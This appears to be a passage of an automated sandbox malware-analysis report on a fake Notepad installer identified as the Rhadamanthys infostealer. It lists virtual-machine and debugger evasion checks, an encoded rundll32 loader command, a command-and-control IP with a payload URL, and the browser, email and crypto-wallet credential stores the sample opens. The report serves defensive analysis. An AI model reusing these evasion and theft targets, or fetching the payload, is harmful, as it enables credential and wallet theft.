AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService.exevmwareuser.exevmwaretray.exevmtoolsd.exeVMwareVMWAREvdservice.exevdagent.exeqemu-ga.e
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxService
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
              Source: rundll32.exe, 00000001.00000003.270774106.0000025AA3A90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: VMWare
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: System32\vboxservice.exe
              Source: rundll32.exe, 00000001.00000003.270774106.0000025AA3A90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: \\.\VBoxGuest
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: vboxservice.exe
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: System32\vboxtray.exe
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: HARDWARE\ACPI\FADT\VBOX__
              Source: Notteppad_SettupX32iX64.exe | Binary or memory string: System32\drivers\VBoxSF.sys

              Anti Debugging

              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep (graph_0-13963)
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9AB8 NtSetInformationThread 0000FFFF,00000011,00000000,00000000
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9587 GetCurrentProcess,CheckRemoteDebuggerPresent
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EA247 VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualFree,IsDebuggerPresent,GetWriteWatch,VirtualFree,VirtualFree,VirtualFree
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9769 VirtualProtect 00000000,?,00000140,?
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9BAA SetLastError,OutputDebugStringW,GetLastError
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_004029FB GetModuleHandleW,strlen,GetProcessHeap,HeapFree,NtProtectVirtualMemory
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E86CB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EA46B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E956D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EA954 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9E7E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9E7E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E5E73 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9ECF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9ECF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E0300 LdrInitializeThunk
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_004011A0 SetUnhandledExceptionFilter,__p__fmode,__p__environ,_cexit,ExitProcess,_setmode,_setmode,_setmode
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E96CA RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9716 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9FE9 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9FDD RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,RaiseException,SetUnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\rundll32.exe | Network Connect: 164.90.172.224 80
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E9201 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,Process32NextW,StrCmpIW,CloseHandle,CloseHandle
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E3F5F NtQuerySystemInformation,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,lstrcmpiW,OpenProcess,GetCurrentProcess,CloseHandle,??3@YAXPAX@Z, explorer.exe
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns6283e8.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dwvaeoaub8abymazv8acqbtahuaqc8atabojwatavli|4pskogeagaa|0idxcjdzmzm|0yjrcqysilufyqqsilmjahdaf9ii0qkmeijbo0kgqe4sg8acejht0qkec0b6w6barcvsipaay8beiebqntiozyacywfa4sm|yria8hii8fi64tmqwfuewad0uj|i8qkcygi68f+zgvlsisejwdz8p8zyuilubhio||rddzig8igsp+lakg7wnqqzv+deegydrpmi|9augzbgzhrdn0herfldqgrehgq|y50builaovv10ilsp0awwoaqfp|vvzxqvrbvuh3vkfxxqfmgtln|1pni|hmi|ji34vzd4x88|bmy|9jpegbpalqrd8aaa+f6vpwqyv3hami8|cfwein3zwbd4twahgdvlsjjc0bd4th8|be|4tnieslxxyl|3ckritpgewd|+fma9lia|ezf8lfhckphktz8p9ni8rbixbfm||ssaptigkewp90huhbyg0pvr3a+gabrapqvxf1|+xbgfqq|a18|3qog8ebsypa|wrbo8lzaevg|4vbd7cmtkwl|yyltaprdfgzfe2qehrrqysuwqd|0zpjigjmi8jv6w|bycgra8jleo8bqyoa1rdtm8a|m|zbowy24bcmap+dxggd+ahy7v|rckily0h|1b9jiqt3g8xkems|bdtvghkvzgfb|19bxkfdqvxf915dwzmxsihsyp0bzacl6ehm|v9||0ifwa+emhug60ynrwglkxdim||76jt9ii1fbeyn|0vgm9kly|9u+yrogcbmi+aphpvrdsbfqbazwivtvpegsil8jccmihb+gcbii|aphet1ip6mifbijvyiri2|r0bijywkhrfi34vy6hz9ficnvtvi3iaq4ihm8|doz37vieslbo1xceegeqygwmohiyqkgics7d7z8iso2ibyiyyxjherbzcriogx7ycl|zwtmkylxtpig|f7beikidbmiwtfjdhmi6qamkyj3vyeayqk3icrhpj2jrgnr0swjctw8|c|syvu6on8btck3zx4mkinhhgyqyd|8ygnt2xembj+pakd6qf184g8|ngyivjlehvni3eejpqimzqk+dub|8jio9hyoip6f2x2m0snsud6ae+uqbgamacmiedkis|4dbletjdamumn91qkbjegsypoblvoa4iwsivopib4|0if|3qsi1vc+uyombsxsi1mjeaf|9digcr0iweklqgalqe=
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns6283e8.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dwvaeoaub8abymazv8acqbtahuaqc8atabojwatavli|4pskogeagaa|0idxcjdzmzm|0yjrcqysilufyqqsilmjahdaf9ii0qkmeijbo0kgqe4sg8acejht0qkec0b6w6barcvsipaay8beiebqntiozyacywfa4sm|yria8hii8fi64tmqwfuewad0uj|i8qkcygi68f+zgvlsisejwdz8p8zyuilubhio||rddzig8igsp+lakg7wnqqzv+deegydrpmi|9augzbgzhrdn0herfldqgrehgq|y50builaovv10ilsp0awwoaqfp|vvzxqvrbvuh3vkfxxqfmgtln|1pni|hmi|ji34vzd4x88|bmy|9jpegbpalqrd8aaa+f6vpwqyv3hami8|cfwein3zwbd4twahgdvlsjjc0bd4th8|be|4tnieslxxyl|3ckritpgewd|+fma9lia|ezf8lfhckphktz8p9ni8rbixbfm||ssaptigkewp90huhbyg0pvr3a+gabrapqvxf1|+xbgfqq|a18|3qog8ebsypa|wrbo8lzaevg|4vbd7cmtkwl|yyltaprdfgzfe2qehrrqysuwqd|0zpjigjmi8jv6w|bycgra8jleo8bqyoa1rdtm8a|m|zbowy24bcmap+dxggd+ahy7v|rckily0h|1b9jiqt3g8xkems|bdtvghkvzgfb|19bxkfdqvxf915dwzmxsihsyp0bzacl6ehm|v9||0ifwa+emhug60ynrwglkxdim||76jt9ii1fbeyn|0vgm9kly|9u+yrogcbmi+aphpvrdsbfqbazwivtvpegsil8jccmihb+gcbii|aphet1ip6mifbijvyiri2|r0bijywkhrfi34vy6hz9ficnvtvi3iaq4ihm8|doz37vieslbo1xceegeqygwmohiyqkgics7d7z8iso2ibyiyyxjherbzcriogx7ycl|zwtmkylxtpig|f7beikidbmiwtfjdhmi6qamkyj3vyeayqk3icrhpj2jrgnr0swjctw8|c|syvu6on8btck3zx4mkinhhgyqyd|8ygnt2xembj+pakd6qf184g8|ngyivjlehvni3eejpqimzqk+dub|8jio9hyoip6f2x2m0snsud6ae+uqbgamacmiedkis|4dbletjdamumn91qkbjegsypoblvoa4iwsivopib4|0if|3qsi1vc+uyombsxsi1mjeaf|9digcr0iweklqgalqe=Jump to behavior
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E434F memset,ShellExecuteExW,CloseHandle,GetLastError
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E4444 _snwprintf,_snwprintf,OpenMutexW,OpenMutexW,_snwprintf,OpenMutexW,GetCurrentProcessId,ProcessIdToSessionId,InitializeSecurityDescriptor,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,CloseHandle
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
              Source: rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
              Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006E396E rand,memset,GetUserDefaultLangID,GetUserDefaultLangID,GetLocaleInfoW,GetLocaleInfoW,GetUserDefaultLangID,GetLocaleInfoW,_snwprintf,WideCharToMultiByte,_snprintf
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EAAA5 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,StrStrIW,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,LocalFree,LocalAlloc,StrStrIW,StrStrIW,StrStrIW,StrStrIW,SetupDiEnumDeviceInfo,LocalFree,SetupDiDestroyDeviceInfoList,GetLastError,GetLastError,GetLastError
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_00407B50 cpuid
              Source: C:\Windows\System32\rundll32.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_00007DF4B3C1B92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006EA63E malloc,GetUserNameW,??3@YAXPAX@Z

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
              Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
              Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: rundll32.exe, 00000001.00000003.297183329.0000025AA412C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framework.parse_path([[%AppData%\ElectrumSV\config]]),
              Source: rundll32.exe, 00000001.00000003.297183329.0000025AA412C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framework.parse_path([[%AppData%\ElectronCash\config]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framework.parse_path([[%AppData%\com.liberty.jaxx]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe | Code function: 0_2_006F0442 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError
              Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_00007DF4B3C1B92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe
              Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_00007DF4B3C448E4 socket,bind
              Tactic: techniques (digit badges shown in front of a technique are reproduced as they appear in the matrix)

              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 2 Native API; 12 Command and Scripting Interpreter; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
              Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Privilege Escalation: 1 Exploitation for Privilege Escalation; 213 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 Masquerading; 33 Virtualization/Sandbox Evasion; 213 Process Injection; 1 Rundll32
              Credential Access: 1 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 1 Account Discovery; 2 File and Directory Discovery; 64 System Information Discovery; 1 Query Registry; 531 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 112 Process Discovery; 1 System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
              Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 21 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
              Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
              Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
              Source | Detection | Scanner | Label
              Notteppad_SettupX32iX64.exe | 20% | ReversingLabs | Win32.Spyware.Rhadamanthys
              Notteppad_SettupX32iX64.exe | 21% | Virustotal |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              https://discord.com | 0% | URL Reputation | safe
              http://164.90.172.224/blob/oo6nbv.a50a | 0% | Avira URL Cloud | safe
              http:///etc/puk.keyMachineGuidSOFTWARE | 0% | Avira URL Cloud | safe
              http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs | 0% | Avira URL Cloud | safe
              http://164.90.172.224/blob/oo6nbv.a50a | 0% | Virustotal |
              No contacted domains info
              Name | Malicious | Antivirus Detection | Reputation
              http://164.90.172.224/blob/oo6nbv.a50a | true | Virustotal: 0%; Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://www.google.com/intl/en_uk/chrome/Google | rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://discord.com | rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro | rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c | rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http:///etc/puk.keyMachineGuidSOFTWARE | rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows | rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/intl/en_uk/chrome/ | rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://discordapp.com | rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google | rundll32.exe, 00000001.00000003.300183680.0000025AA39D9000.00000004.00000020.00020000.00000000.sdmp | false | | high
